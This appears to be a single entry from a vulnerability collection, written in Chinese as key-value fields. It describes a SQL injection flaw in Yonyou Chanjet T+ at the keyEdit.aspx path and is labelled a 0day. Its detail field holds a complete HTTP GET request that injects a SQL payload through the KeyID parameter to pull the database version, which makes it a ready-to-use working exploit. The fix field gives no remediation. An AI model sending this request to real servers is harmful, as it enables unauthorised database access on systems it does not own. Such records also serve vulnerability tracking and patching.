vendor = "用友"
name = "用友 畅捷通T+ keyEdit.aspx 存在SQL注入"
type = "SQL注入"
version = "未知"
path = "/tplus/UFAQD/keyEdit.aspx"
detail = "GET /tplus/UFAQD/keyEdit.aspx?KeyID=222%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1"
fix = "某厂商情报，实际24年洞"
date = "0702"
label = "0day"
verifier = "AdySec"
